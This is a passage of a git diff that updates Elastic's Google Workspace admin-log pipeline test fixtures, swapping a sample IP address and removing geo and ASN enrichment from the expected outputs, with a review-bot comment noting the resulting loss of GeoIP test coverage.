@@ -674,7 +530,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -698,8 +554,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091078800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717721500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS", "id": "1", 
@@ -729,31 +585,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -767,7 +605,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -791,8 +629,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091080800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717726100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE", "id": "1", @@ -830,7 +668,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -854,35 +692,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.091082700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}", + "ingested": "2021-12-09T13:38:43.717729800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}", "provider": "admin", "action": "GROUP_MEMBER_BULK_UPLOAD", "id": "1", @@ -913,7 +733,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -932,35 +752,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.091084700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}", + "ingested": "2021-12-09T13:38:43.717734400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}", "provider": "admin", "action": "GROUP_MEMBERS_DOWNLOAD", "id": "1", 
@@ -983,31 +785,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1021,7 +805,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1045,8 +829,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091086800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:43.717738700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_NAME", "id": "1", 
@@ -1076,31 +860,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1114,7 +880,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1138,8 +904,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091088900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:43.717743800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_SETTING", "id": "1", @@ -1177,7 +943,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1205,35 +971,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.091090800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}", + "ingested": "2021-12-09T13:38:43.717749700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}", "provider": "admin", "action": "WHITELISTED_GROUPS_UPDATED", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log index c028ff6ba1c..a240d727301 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log 
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log 
@@ -1,8 +1,8 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_ALL_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"CHANGE_LICENSE_AUTO_ASSIGN","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"SKU_NAME","value":"sku"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"UPDATE_DYNAMIC_LICENSE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_ALL_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"CHANGE_LICENSE_AUTO_ASSIGN","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"SKU_NAME","value":"sku"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"UPDATE_DYNAMIC_LICENSE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json
index b234e175c0e..c405f24e075 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json
@@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": {
@@ -32,35 +32,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.574923100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "ingested": "2021-12-09T13:38:45.984529200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "provider": "admin",
 "action": "ORG_USERS_LICENSE_ASSIGNMENT",
 "id": "1",
@@ -90,7 +72,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
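Review bot: The regenerated expected document drops `source.geo` and `source.as` outright instead of replacing them with the enrichment for the new address, so after this change the licenses test no longer verifies the pipeline's GeoIP and ASN processors at all; the same pattern repeats in every other 35→17 hunk of this file. If the point of moving to 67.43.156.13 was to use an address the package test database covers, the geo block should reappear with the new values; if that database has no entry for it, the loss of coverage is worth stating in the PR so a later regression in the geoip step is not masked. Please also confirm the expected file was produced by regenerating against the pipeline rather than by deleting the blocks by hand, since the `ingested` timestamps suggest a regeneration but the missing enrichment does not.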
@@ -112,35 +94,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.574932100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "ingested": "2021-12-09T13:38:45.984540Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "provider": "admin",
 "action": "ORG_ALL_USERS_LICENSE_ASSIGNMENT",
 "id": "1",
@@ -170,7 +134,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -192,35 +156,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.574934500Z",
